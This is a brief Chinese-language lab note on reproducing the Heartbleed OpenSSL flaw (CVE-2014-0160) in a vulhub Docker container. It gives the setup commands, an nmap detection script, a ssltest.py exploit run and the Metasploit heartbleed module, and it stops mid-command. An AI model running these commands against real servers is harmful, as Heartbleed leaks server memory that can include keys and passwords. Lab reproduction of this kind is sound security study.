[网安笔记]48 复现heart bleed(CVE-2014-0160)

• 搭建vulhub环境
• 开启heartbleed容器
• 探测漏洞
• 漏洞复现
• 受影响的版本
• 附容器基本操作

参见https://blog.csdn.net/weixin_42172261/article/details/119004158

cd vulhub/openssl/heartbleed
sudo docker-compose up -d
[关闭容器sudo docker-compose down]

使用nmap的ssl-heartbleed.nse脚本探测是否存在漏洞。
nmap -p 端口 --script ssl-heartbleed.nse 容器ip

脚本复现
python ssltest.py 172.17.0.1 -p 443
msf复现
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOST